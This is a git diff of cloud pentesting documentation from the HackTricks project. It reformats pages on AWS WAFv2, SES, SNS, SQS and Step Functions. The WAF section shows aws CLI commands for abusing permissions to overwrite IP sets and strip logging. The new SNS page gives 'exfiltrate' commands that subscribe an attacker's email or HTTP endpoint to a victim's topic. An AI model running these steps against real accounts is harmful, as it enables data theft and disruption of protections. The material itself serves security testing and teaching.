"arn:aws:wafv2:us-east-1:123456789012:regional/webacl/AllowLegitimateIPsWebACL/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", + "DefaultAction": { + "Allow": {} }, - "LockToken": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" + "Description": "", + "Rules": [ + { + "Name": "AllowLegitimateIPsRule", + "Priority": 0, + "Statement": { + "IPSetReferenceStatement": { + "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" + } + }, + "Action": { + "Allow": {} + }, + "VisibilityConfig": { + "SampledRequestsEnabled": false, + "CloudWatchMetricsEnabled": false, + "MetricName": "AllowLegitimateIPsRule" + } + } + ], + "VisibilityConfig": { + "SampledRequestsEnabled": false, + "CloudWatchMetricsEnabled": false, + "MetricName": "AllowLegitimateIPsWebACL" + }, + "Capacity": 1, + "ManagedByFirewallManager": false, + "LabelNamespace": "awswaf:123456789012:webacl:AllowLegitimateIPsWebACL:" + }, + "LockToken": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" } - ``` Command to update the Web ACL: @@ -341,23 +325,23 @@ The **rule.json** file would look like: ```json [ - { - "Name": "BlockLegitimateIPsRule", - "Priority": 0, - "Statement": { - "IPSetReferenceStatement": { - "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" - } - }, - "Action": { - "Block": {} - }, - "VisibilityConfig": { - "SampledRequestsEnabled": false, - "CloudWatchMetricsEnabled": false, - "MetricName": "BlockLegitimateIPRule" - } + { + "Name": "BlockLegitimateIPsRule", + "Priority": 0, + "Statement": { + "IPSetReferenceStatement": { + "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" + } + }, + "Action": { + "Block": {} + }, + "VisibilityConfig": { + "SampledRequestsEnabled": false, + "CloudWatchMetricsEnabled": false, + "MetricName": "BlockLegitimateIPRule" } + } ] ``` @@ -369,20 +353,20 @@ The **`wafv2:AssociateWebACL`** permission would allow an attacker to associate The additional permissions would be needed depending on the protected resource type: -* **Associate** - * apigateway:SetWebACL - * apprunner:AssociateWebAcl - * appsync:SetWebACL - * cognito-idp:AssociateWebACL - * ec2:AssociateVerifiedAccessInstanceWebAcl - * elasticloadbalancing:SetWebAcl -* **Disassociate** - * apigateway:SetWebACL - * apprunner:DisassociateWebAcl - * appsync:SetWebACL - * cognito-idp:DisassociateWebACL - * ec2:DisassociateVerifiedAccessInstanceWebAcl - * elasticloadbalancing:SetWebAcl +- **Associate** + - apigateway:SetWebACL + - apprunner:AssociateWebAcl + - appsync:SetWebACL + - cognito-idp:AssociateWebACL + - ec2:AssociateVerifiedAccessInstanceWebAcl + - elasticloadbalancing:SetWebAcl +- **Disassociate** + - apigateway:SetWebACL + - apprunner:DisassociateWebAcl + - appsync:SetWebACL + - cognito-idp:DisassociateWebACL + - ec2:DisassociateVerifiedAccessInstanceWebAcl + - elasticloadbalancing:SetWebAcl ```bash # Associate @@ -403,13 +387,13 @@ aws wafv2 create-ip-set --name --ip-address-version --addr # Update IP set aws wafv2 update-ip-set --name --id --addresses --lock-token --scope | CLOUDFRONT --region=us-east-1> # Delete IP set -aws wafv2 delete-ip-set --name --id --lock-token --scope | CLOUDFRONT --region=us-east-1> +aws wafv2 delete-ip-set --name --id --lock-token --scope | CLOUDFRONT --region=us-east-1> ``` The following example shows how to **overwrite the existing IP set by the desired IP set**: ```bash -aws wafv2 update-ip-set --name LegitimateIPv4Set --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --addresses 99.99.99.99/32 --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --scope CLOUDFRONT --region us-east-1 +aws wafv2 update-ip-set --name LegitimateIPv4Set --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --addresses 99.99.99.99/32 --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --scope CLOUDFRONT --region us-east-1 ``` **Potential Impact**: Unauthorized access and block of legitimate traffic. @@ -418,13 +402,13 @@ aws wafv2 update-ip-set --name LegitimateIPv4Set --id 1a2b3c4d-1a2b-1a2b-1a2b-1a An attacker with these permissions would be able to manipulate the regular expression pattern sets used by AWS WAF to control and filter incoming traffic based on specific patterns. -* Creating new regex patterns would help an attacker to allow harmful content -* Updating the existing patterns, an attacker would to bypass security rules -* Deleting patterns that are designed to block malicious activities could lead an attacker to the send malicious payloads and bypass the security measures. +- Creating new regex patterns would help an attacker to allow harmful content +- Updating the existing patterns, an attacker would to bypass security rules +- Deleting patterns that are designed to block malicious activities could lead an attacker to the send malicious payloads and bypass the security measures. ```bash # Create regex pattern set -aws wafv2 create-regex-pattern-set --name --regular-expression-list --scope | CLOUDFRONT --region=us-east-1> [--description ] +aws wafv2 create-regex-pattern-set --name --regular-expression-list --scope | CLOUDFRONT --region=us-east-1> [--description ] # Update regex pattern set aws wafv2 update-regex-pattern-set --name --id --regular-expression-list --lock-token --scope | CLOUDFRONT --region=us-east-1> # Delete regex pattern set @@ -439,13 +423,12 @@ An attacker with the **`wafv2:DeleteLoggingConfiguration`** would be able to rem During the creation process, the service automatically sets up the necessary permissions to allow logs to be written to the specified logging destination: -* **Amazon CloudWatch Logs:** AWS WAF creates a resource policy on the designated CloudWatch Logs log group. This policy ensures that AWS WAF has the permissions required to write logs to the log group. -* **Amazon S3 Bucket:** AWS WAF creates a bucket policy on the designated S3 bucket. This policy grants AWS WAF the permissions necessary to upload logs to the specified bucket. -* **Amazon Kinesis Data Firehose:** AWS WAF creates a service-linked role specifically for interacting with Kinesis Data Firehose. This role allows AWS WAF to deliver logs to the configured Firehose stream. +- **Amazon CloudWatch Logs:** AWS WAF creates a resource policy on the designated CloudWatch Logs log group. This policy ensures that AWS WAF has the permissions required to write logs to the log group. +- **Amazon S3 Bucket:** AWS WAF creates a bucket policy on the designated S3 bucket. This policy grants AWS WAF the permissions necessary to upload logs to the specified bucket. +- **Amazon Kinesis Data Firehose:** AWS WAF creates a service-linked role specifically for interacting with Kinesis Data Firehose. This role allows AWS WAF to deliver logs to the configured Firehose stream. -{% hint style="info" %} -It is possible to define only one logging destination per web ACL. -{% endhint %} +> [!NOTE] +> It is possible to define only one logging destination per web ACL. ```bash # Put logging configuration @@ -462,7 +445,7 @@ An attacker with this permissions would be able to delete existing API keys, ren ```bash # Delete API key -aws wafv2 delete-api-key --api-key --scope | CLOUDFRONT --region=us-east-1> +aws wafv2 delete-api-key --api-key --scope | CLOUDFRONT --region=us-east-1> ``` **Potential Impact**: Disable CAPTCHA protections or disrupt application functionality, leading to security breaches and potential data theft. @@ -482,20 +465,7 @@ aws wafv2 untag-resource --resource-arn --tag-keys ## References -* [https://www.citrusconsulting.com/aws-web-application-firewall-waf/#:\~:text=Conditions%20allow%20you%20to%20specify,user%20via%20a%20web%20application](https://www.citrusconsulting.com/aws-web-application-firewall-waf/) -* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_awswafv2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html) +- [https://www.citrusconsulting.com/aws-web-application-firewall-waf/#:\~:text=Conditions%20allow%20you%20to%20specify,user%20via%20a%20web%20application](https://www.citrusconsulting.com/aws-web-application-firewall-waf/) +- [https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md similarity index 61% rename from pentesting-cloud/aws-security/aws-services/aws-ses-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md index bc219d0c6..88fb06dd8 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md @@ -1,19 +1,6 @@ # AWS - SES Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information @@ -51,11 +38,9 @@ It's also possible to do this from the AWS console web. ### Enumeration -{% hint style="warning" %} -Note that SES has 2 APIs: **`ses`** and **`sesv2`**. Some actions are in both APIs and others are just in one of the two. -{% endhint %} +> [!WARNING] +> Note that SES has 2 APIs: **`ses`** and **`sesv2`**. Some actions are in both APIs and others are just in one of the two. -{% code overflow="wrap" %} ```bash # Get info about the SES account aws sesv2 get-account @@ -132,25 +117,11 @@ aws ses get-send-quota ## Get statistics aws ses get-send-statistics ``` -{% endcode %} ### Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-ses-post-exploitation.md" %} -[aws-ses-post-exploitation.md](../aws-post-exploitation/aws-ses-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-ses-post-exploitation.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md new file mode 100644 index 000000000..01467ee06 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md @@ -0,0 +1,79 @@ +# AWS - SNS Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## SNS + +Amazon Simple Notification Service (Amazon SNS) is described as a **fully managed messaging service**. It supports both **application-to-application** (A2A) and **application-to-person** (A2P) communication types. + +Key features for A2A communication include **publish/subscribe (pub/sub) mechanisms**. These mechanisms introduce **topics**, crucial for enabling high-throughput, **push-based, many-to-many messaging**. This feature is highly advantageous in scenarios that involve distributed systems, microservices, and event-driven serverless architectures. By leveraging these topics, publisher systems can efficiently distribute messages to a **wide range of subscriber systems**, facilitating a fanout messaging pattern. + +### **Difference with SQS** + +**SQS** is a **queue-based** service that allows point-to-point communication, ensuring that messages are processed by a **single consumer**. It offers **at-least-once delivery**, supports standard and FIFO queues, and allows message retention for retries and delayed processing.\ +On the other hand, **SNS** is a **publish/subscribe-based service**, enabling **one-to-many** communication by broadcasting messages to **multiple subscribers** simultaneously. It supports **various subscription endpoints like email, SMS, Lambda functions, and HTTP/HTTPS**, and provides filtering mechanisms for targeted message delivery.\ +While both services enable decoupling between components in distributed systems, SQS focuses on queued communication, and SNS emphasizes event-driven, fan-out communication patterns. + +### **Enumeration** + +```bash +# Get topics & subscriptions +aws sns list-topics +aws sns list-subscriptions +aws sns list-subscriptions-by-topic --topic-arn + +# Check privescs & post-exploitation +aws sns publish --region \ + --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \ + --message file://message.txt + +# Exfiltrate through email +## You will receive an email to confirm the subscription +aws sns subscribe --region \ + --topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \ + --protocol email \ + --notification-endpoint my-email@example.com + +# Exfiltrate through web server +## You will receive an initial request with a URL in the field "SubscribeURL" +## that you need to access to confirm the subscription +aws sns subscribe --region \ + --protocol http \ + --notification-endpoint http:/// \ + --topic-arn +``` + +> [!CAUTION] +> Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used (HTTP or HTTPS cannot be used). +> +> Also, even if the `--topic-arn` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. + +#### Unauthenticated Access + +{{#ref}} +../aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md +{{#endref}} + +#### Privilege Escalation + +{{#ref}} +../aws-privilege-escalation/aws-sns-privesc.md +{{#endref}} + +#### Post Exploitation + +{{#ref}} +../aws-post-exploitation/aws-sns-post-exploitation.md +{{#endref}} + +#### Persistence + +{{#ref}} +../aws-persistence/aws-sns-persistence.md +{{#endref}} + +## References + +- [https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/](https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md new file mode 100644 index 000000000..63770cd06 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md @@ -0,0 +1,53 @@ +# AWS - SQS Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## SQS + +Amazon Simple Queue Service (SQS) is presented as a **fully managed message queuing service**. Its main function is to assist in the scaling and decoupling of microservices, distributed systems, and serverless applications. The service is designed to remove the need for managing and operating message-oriented middleware, which can often be complex and resource-intensive. This elimination of complexity allows developers to direct their efforts towards more innovative and differentiating aspects of their work. + +### Enumeration + +```bash +# Get queues info +aws sqs list-queues +aws sqs get-queue-attributes --queue-url --attribute-names All + +# More about this in privesc & post-exploitation +aws sqs receive-message --queue-url + +aws sqs send-message --queue-url --message-body +``` + +> [!CAUTION] +> Also, even if the `--queue-url` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. + +#### Unauthenticated Access + +{{#ref}} +../aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md +{{#endref}} + +#### Privilege Escalation + +{{#ref}} +../aws-privilege-escalation/aws-sqs-privesc.md +{{#endref}} + +#### Post Exploitation + +{{#ref}} +../aws-post-exploitation/aws-sqs-post-exploitation.md +{{#endref}} + +#### Persistence + +{{#ref}} +../aws-persistence/aws-sqs-persistence.md +{{#endref}} + +## References + +- https://docs.aws.amazon.com/cdk/api/v2/python/aws\_cdk.aws\_sqs/README.html + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md similarity index 56% rename from pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md index 1ca042e36..c5c6ed131 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md @@ -1,19 +1,6 @@ # AWS - Step Functions Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Step Functions @@ -25,33 +12,33 @@ AWS Step Functions is a workflow service that enables you to coordinate and orch AWS Step Functions offers two types of **state machine workflows**: Standard and Express. -* **Standard Workflow**: This default workflow type is designed for long-running, durable, and auditable processes. It supports **exactly-once execution**, ensuring tasks run only once unless retries are specified. It is ideal for workflows needing detailed execution history and can run for up to one year. -* **Express Workflow**: This type is ideal for high-volume, short-duration tasks, running up to five minutes. They support **at-least-once execution**, suitable for idempotent tasks like data processing. These workflows are optimized for cost and performance, charging based on executions, duration, and memory usage. +- **Standard Workflow**: This default workflow type is designed for long-running, durable, and auditable processes. It supports **exactly-once execution**, ensuring tasks run only once unless retries are specified. It is ideal for workflows needing detailed execution history and can run for up to one year. +- **Express Workflow**: This type is ideal for high-volume, short-duration tasks, running up to five minutes. They support **at-least-once execution**, suitable for idempotent tasks like data processing. These workflows are optimized for cost and performance, charging based on executions, duration, and memory usage. ### States States are the essential units of state machines. They define the individual steps within a workflow, being able to perform a variety of functions depending on its type: -* **Task:** Executes a job, often using an AWS service like Lambda. -* **Choice:** Makes decisions based on input. -* **Fail/Succeed:** Ends the execution with a failure or success. -* **Pass:** Passes input to output or injects data. -* **Wait:** Delays execution for a set time. -* **Parallel:** Initiates parallel branches. -* **Map:** Dynamically iterates steps over items. +- **Task:** Executes a job, often using an AWS service like Lambda. +- **Choice:** Makes decisions based on input. +- **Fail/Succeed:** Ends the execution with a failure or success. +- **Pass:** Passes input to output or injects data. +- **Wait:** Delays execution for a set time. +- **Parallel:** Initiates parallel branches. +- **Map:** Dynamically iterates steps over items. ### Task A **Task** state represents a single unit of work executed by a state machine. Tasks can invoke various resources, including activities, Lambda functions, AWS services, or third-party APIs. -* **Activities**: Custom workers you manage, suitable for long-running processes. - * Resource: **`arn:aws:states:region:account:activity:name`**. -* **Lambda Functions**: Executes AWS Lambda functions. - * Resource: **`arn:aws:lambda:region:account:function:function-name`**. -* **AWS Services**: Integrates directly with other AWS services, like DynamoDB or S3. - * Resource: **`arn:partition:states:region:account:servicename:APIname`**. -* **HTTP Task**: Calls third-party APIs. - * Resource field: **`arn:aws:states:::http:invoke`**. Then, you should provide the API endpoint configuration details, such as the API URL, method, and authentication details. +- **Activities**: Custom workers you manage, suitable for long-running processes. + - Resource: **`arn:aws:states:region:account:activity:name`**. +- **Lambda Functions**: Executes AWS Lambda functions. + - Resource: **`arn:aws:lambda:region:account:function:function-name`**. +- **AWS Services**: Integrates directly with other AWS services, like DynamoDB or S3. + - Resource: **`arn:partition:states:region:account:servicename:APIname`**. +- **HTTP Task**: Calls third-party APIs. + - Resource field: **`arn:aws:states:::http:invoke`**. Then, you should provide the API endpoint configuration details, such as the API URL, method, and authentication details. The following example shows a Task state definition that invokes a Lambda function called HelloWorld: @@ -71,8 +58,8 @@ The following example shows a Task state definition that invokes a Lambda functi A **Choice** state adds conditional logic to a workflow, enabling decisions based on input data. It evaluates the specified conditions and transitions to the corresponding state based on the results. -* **Comparison**: Each choice rule includes a comparison operator (e.g., **`NumericEquals`**, **`StringEquals`**) that compares an input variable to a specified value or another variable. -* **Next Field**: Choice states do not support don't support the **`End`** field, instead, they define the **`Next`** state to transition to if the comparison is true. +- **Comparison**: Each choice rule includes a comparison operator (e.g., **`NumericEquals`**, **`StringEquals`**) that compares an input variable to a specified value or another variable. +- **Next Field**: Choice states do not support don't support the **`End`** field, instead, they define the **`Next`** state to transition to if the comparison is true. Example of **Choice** state: @@ -90,8 +77,9 @@ A **`Fail`** state stops the execution of a state machine and marks it as a fail A **`Succeed`** state stops the execution successfully. It is typically used to terminate the workflow when it completes successfully. This state does not require a **`Next`** field. -{% tabs %} -{% tab title="Fail example" %} +{{#tabs }} +{{#tab name="Fail example" }} + ```json "FailState": { "Type": "Fail", @@ -99,16 +87,19 @@ A **`Succeed`** state stops the execution successfully. It is typically used to "Cause": "Error details" } ``` -{% endtab %} -{% tab title="Succeed example" %} +{{#endtab }} + +{{#tab name="Succeed example" }} + ```json "SuccessState": { "Type": "Succeed" } ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} ### Pass @@ -127,42 +118,44 @@ A **Pass** state passes its input to its output either without performing any wo A **Wait** state delays the execution of the state machine for a specified duration. There are three primary methods to configure the wait time: -* **X Seconds**: A fixed number of seconds to wait. +- **X Seconds**: A fixed number of seconds to wait. - ```json - "WaitState": { - "Type": "Wait", - "Seconds": 10, - "Next": "NextState" - } - ``` -* **Absolute Timestamp**: An exact time to wait until. + ```json + "WaitState": { + "Type": "Wait", + "Seconds": 10, + "Next": "NextState" + } + ``` - ```json - "WaitState": { - "Type": "Wait", - "Timestamp": "2024-03-14T01:59:00Z", - "Next": "NextState" - } - ``` -* **Dynamic Wait**: Based on input using **`SecondsPath`** or **`TimestampPath`**. +- **Absolute Timestamp**: An exact time to wait until. - ```json - jsonCopiar código - "WaitState": { - "Type": "Wait", - "TimestampPath": "$.expirydate", - "Next": "NextState" - } - ``` + ```json + "WaitState": { + "Type": "Wait", + "Timestamp": "2024-03-14T01:59:00Z", + "Next": "NextState" + } + ``` + +- **Dynamic Wait**: Based on input using **`SecondsPath`** or **`TimestampPath`**. + + ```json + jsonCopiar código + "WaitState": { + "Type": "Wait", + "TimestampPath": "$.expirydate", + "Next": "NextState" + } + ``` ### Parallel A **Parallel** state allows you to execute multiple branches of tasks concurrently within your workflow. Each branch runs independently and processes its own sequence of states. The execution waits until all branches complete before proceeding to the next state. Its key fields are: -* **Branches**: An array defining the parallel execution paths. Each branch is a separate state machine. -* **ResultPath**: Defines where (in the input) to place the combined output of the branches. -* **Retry and Catch**: Error handling configurations for the parallel state. +- **Branches**: An array defining the parallel execution paths. Each branch is a separate state machine. +- **ResultPath**: Defines where (in the input) to place the combined output of the branches. +- **Retry and Catch**: Error handling configurations for the parallel state. ```json "ParallelState": { @@ -185,77 +178,78 @@ A **Parallel** state allows you to execute multiple branches of tasks concurrent A **Map** state enables the execution of a set of steps for each item in an dataset. It's used for parallel processing of data. Depending on how you want to process the items of the dataset, Step Functions provides the following modes: -* **Inline Mode**: Executes a subset of states for each JSON array item. Suitable for small-scale tasks with less than 40 parallel iterations, running each of them in the context of the workflow that contains the **`Map`** state. +- **Inline Mode**: Executes a subset of states for each JSON array item. Suitable for small-scale tasks with less than 40 parallel iterations, running each of them in the context of the workflow that contains the **`Map`** state. - ```json - "MapState": { - "Type": "Map", - "ItemsPath": "$.arrayItems", - "ItemProcessor": { - "ProcessorConfig": { - "Mode": "INLINE" - }, - "StartAt": "AddState", - "States": { - "AddState": { - "Type": "Task", - "Resource": "arn:aws:states:::lambda:invoke", - "OutputPath": "$.Payload", - "Parameters": { - "FunctionName": "arn:aws:lambda:::function:add-function" - }, - "End": true - } - } - }, - "End": true - "ResultPath": "$.detail.added", - "ItemsPath": "$.added" - } - ``` -* **Distributed Mode**: Designed for large-scale parallel processing with high concurrency. Supports processing large datasets, such as those stored in Amazon S3, enabling a high concurrency of up 10,000 parallel child workflow executions, running these child as a separate child execution. - - ```json - "DistributedMapState": { - "Type": "Map", - "ItemReader": { - "Resource": "arn:aws:states:::s3:getObject", - "Parameters": { - "Bucket": "my-bucket", - "Key": "data.csv" - } - }, - "ItemProcessor": { + ```json + "MapState": { + "Type": "Map", + "ItemsPath": "$.arrayItems", + "ItemProcessor": { "ProcessorConfig": { - "Mode": "DISTRIBUTED", - "ExecutionType": "EXPRESS" + "Mode": "INLINE" }, - "StartAt": "ProcessItem", + "StartAt": "AddState", "States": { - "ProcessItem": { - "Type": "Task", - "Resource": "arn:aws:lambda:region:account-id:function:my-function", - "End": true - } + "AddState": { + "Type": "Task", + "Resource": "arn:aws:states:::lambda:invoke", + "OutputPath": "$.Payload", + "Parameters": { + "FunctionName": "arn:aws:lambda:::function:add-function" + }, + "End": true + } } + }, + "End": true + "ResultPath": "$.detail.added", + "ItemsPath": "$.added" + } + ``` + +- **Distributed Mode**: Designed for large-scale parallel processing with high concurrency. Supports processing large datasets, such as those stored in Amazon S3, enabling a high concurrency of up 10,000 parallel child workflow executions, running these child as a separate child execution. + + ```json + "DistributedMapState": { + "Type": "Map", + "ItemReader": { + "Resource": "arn:aws:states:::s3:getObject", + "Parameters": { + "Bucket": "my-bucket", + "Key": "data.csv" + } + }, + "ItemProcessor": { + "ProcessorConfig": { + "Mode": "DISTRIBUTED", + "ExecutionType": "EXPRESS" }, - "End": true - "ResultWriter": { - "Resource": "arn:aws:states:::s3:putObject", - "Parameters": { - "Bucket": "myOutputBucket", - "Prefix": "csvProcessJobs" - } - } - } - ``` + "StartAt": "ProcessItem", + "States": { + "ProcessItem": { + "Type": "Task", + "Resource": "arn:aws:lambda:region:account-id:function:my-function", + "End": true + } + } + }, + "End": true + "ResultWriter": { + "Resource": "arn:aws:states:::s3:putObject", + "Parameters": { + "Bucket": "myOutputBucket", + "Prefix": "csvProcessJobs" + } + } + } + ``` ### Versions and aliases Step Functions also lets you manage workflow deployments through **versions** and **aliases** of state machines. A version represents a snapshot of a state machine that can be executed. Aliases serve as pointers to up to two versions of a state machine. -* **Versions**: These immutable snapshots of a state machine are created from the most recent revision of that state machine. Each version is identified by a unique ARN that combines the state machine ARN with the version number, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:version-number`**). Versions cannot be edited, but you can update the state machine and publish a new version, or use the desired state machine version. -* **Aliases**: These pointers can reference up to two versions of the same state machine. Multiple aliases can be created for a single state machine, each identified by a unique ARN constructed by combining the state machine ARN with the alias name, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:aliasName`**). Aliases enable routing of traffic between one of the two versions of a state machine. Alternatively, an alias can point to a single specific version of the state machine, but not to other aliases. They can be updated to redirect to a different version of the state machine as needed, facilitating controlled deployments and workflow management. +- **Versions**: These immutable snapshots of a state machine are created from the most recent revision of that state machine. Each version is identified by a unique ARN that combines the state machine ARN with the version number, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:version-number`**). Versions cannot be edited, but you can update the state machine and publish a new version, or use the desired state machine version. +- **Aliases**: These pointers can reference up to two versions of the same state machine. Multiple aliases can be created for a single state machine, each identified by a unique ARN constructed by combining the state machine ARN with the alias name, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:aliasName`**). Aliases enable routing of traffic between one of the two versions of a state machine. Alternatively, an alias can point to a single specific version of the state machine, but not to other aliases. They can be updated to redirect to a different version of the state machine as needed, facilitating controlled deployments and workflow management. For more detailed information about **ASL**, check: [**Amazon States Language**](https://states-language.net/spec.html). @@ -263,8 +257,8 @@ For more detailed information about **ASL**, check: [**Amazon States Language**] AWS Step Functions utilizes AWS Identity and Access Management (IAM) roles to control access to resources and actions within state machines. Here are the key aspects related to security and IAM roles in AWS Step Functions: -* **Execution Role**: Each state machine in AWS Step Functions is associated with an IAM execution role. This role defines what actions the state machine can perform on your behalf. When a state machine transitions between states that interact with AWS services (like invoking Lambda functions, accessing DynamoDB, etc.), it assumes this execution role to carry out those actions. -* **Permissions**: The IAM execution role must be configured with permissions that allow the necessary actions on other AWS services. For example, if your state machine needs to invoke AWS Lambda functions, the IAM role must have **`lambda:InvokeFunction`** permissions. Similarly, if it needs to write to DynamoDB, appropriate permissions (**`dynamodb:PutItem`**, **`dynamodb:UpdateItem`**, etc.) must be granted. +- **Execution Role**: Each state machine in AWS Step Functions is associated with an IAM execution role. This role defines what actions the state machine can perform on your behalf. When a state machine transitions between states that interact with AWS services (like invoking Lambda functions, accessing DynamoDB, etc.), it assumes this execution role to carry out those actions. +- **Permissions**: The IAM execution role must be configured with permissions that allow the necessary actions on other AWS services. For example, if your state machine needs to invoke AWS Lambda functions, the IAM role must have **`lambda:InvokeFunction`** permissions. Similarly, if it needs to write to DynamoDB, appropriate permissions (**`dynamodb:PutItem`**, **`dynamodb:UpdateItem`**, etc.) must be granted. ## Enumeration @@ -278,14 +272,14 @@ aws stepfunctions list-state-machines ## Retrieve informatio about the specified state machine aws stepfunctions describe-state-machine --state-machine-arn -## List versions for the specified state machine +## List versions for the specified state machine aws stepfunctions list-state-machine-versions --state-machine-arn ## List aliases for the specified state machine aws stepfunctions list-state-machine-aliases --state-machine-arn ## Retrieve information about the specified state machine alias aws stepfunctions describe-state-machine-alias 